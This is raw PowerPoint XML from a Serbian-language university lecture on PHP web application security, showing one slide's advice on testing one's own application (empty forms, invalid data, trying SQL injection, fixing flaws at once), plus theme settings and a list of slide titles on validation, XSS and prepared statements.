            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>moguće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>scenarije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taj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>način</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koristite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikaciju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Krenite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prostih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stvari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>isključite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> JavaScript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pošaljite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prazan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>unesite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>neispravne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pokušajte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SQL Injection.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>otkrijete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najmanji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogući</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>propust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>riješite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odmah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/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484389916"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Wkbkdes">
  <a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="009EA1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C1FEF9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="DC0081"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="DDFEFB"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C70074"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="618FFD"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="CECECE"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Wkbkdes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sr-Latn-R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anose="020B0606020202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sr-Latn-R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anose="020B0606020202030204" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="Wkbk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kbk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kbk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kbk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kbk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kbk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kbk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C:\Tools\Template\WKBKDES.POT</Template>
  <TotalTime>7640</TotalTime>
  <Words>4081</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>432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Wingdings</vt:lpstr>
      <vt:lpstr>Lucida Sans Typewriter</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wkbkdes</vt:lpstr>
      <vt:lpstr>Predavanje 11 Web Programiranje Sigurnost PHP aplikacija</vt:lpstr>
      <vt:lpstr>Uvod</vt:lpstr>
      <vt:lpstr>Uvod, nastavak…</vt:lpstr>
      <vt:lpstr>Sigurnost aplikacije</vt:lpstr>
      <vt:lpstr>Sigurnost aplikacije…</vt:lpstr>
      <vt:lpstr>Bezbijednost aplikativne arhitekture</vt:lpstr>
      <vt:lpstr>Upravljanje greškama</vt:lpstr>
      <vt:lpstr>Filtriranje ulaza</vt:lpstr>
      <vt:lpstr>Testiranje</vt:lpstr>
      <vt:lpstr>Slanje ulaznih podataka</vt:lpstr>
      <vt:lpstr>Validacija ulaza</vt:lpstr>
      <vt:lpstr>Validacija ulaza…</vt:lpstr>
      <vt:lpstr>Validacija brojnih vrijednosti</vt:lpstr>
      <vt:lpstr>Validacija brojnih vrijednosti…</vt:lpstr>
      <vt:lpstr>Validacija brojnih vrijednosti…</vt:lpstr>
      <vt:lpstr>Kastovanje podataka</vt:lpstr>
      <vt:lpstr>Validacija brojnih vrijednosti</vt:lpstr>
      <vt:lpstr>Validacija tekstualnih ulaza</vt:lpstr>
      <vt:lpstr>Validacija tekstualnih ulaza…</vt:lpstr>
      <vt:lpstr>Validacija tekstualnih ulaza…</vt:lpstr>
      <vt:lpstr>Ctype funkcije</vt:lpstr>
      <vt:lpstr>Filter funkcije</vt:lpstr>
      <vt:lpstr>Kriterijumi kod filtar funkcija</vt:lpstr>
      <vt:lpstr>Regularni izrazi (regular expression, regex)</vt:lpstr>
      <vt:lpstr>Regularni izrazi (regular expression, regex)…</vt:lpstr>
      <vt:lpstr>Regularni izrazi (regular expression, regex)…</vt:lpstr>
      <vt:lpstr>Cross Site Scripting – XSS</vt:lpstr>
      <vt:lpstr>Primjer Cross Site Scripting – XSS</vt:lpstr>
      <vt:lpstr>Primjer Cross Site Scripting – XSS…</vt:lpstr>
      <vt:lpstr>HTML entiteti</vt:lpstr>
      <vt:lpstr>HTML entiteti…</vt:lpstr>
      <vt:lpstr>Izbacivanje HTML tagova</vt:lpstr>
      <vt:lpstr>SQL Injection </vt:lpstr>
      <vt:lpstr>Provjera korisničkih podataka</vt:lpstr>
      <vt:lpstr>Provjera korisničkih podataka…</vt:lpstr>
      <vt:lpstr>Provjera korisničkih podataka…</vt:lpstr>
      <vt:lpstr>Zaštita</vt:lpstr>
      <vt:lpstr>mysql_real_escape_string()</vt:lpstr>
      <vt:lpstr>Pripremljeni izrazi (Prepared statements)</vt:lpstr>
      <vt:lpstr>Pripremljeni izrazi (Prepared statements)…</vt:lpstr>
      <vt:lpstr>Pripremljeni izrazi (Prepared statements)…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6: Arrays</dc:title>
  <dc:creator>budo</dc:creator>
  <cp:lastModifiedBy>Budo LUTOVAC</cp:lastModifiedBy>
  <cp:revision>504</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2000-09-25T11:41:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-03T21:51:23Z</dcterms:modified>
</cp:coreProperties>
</file>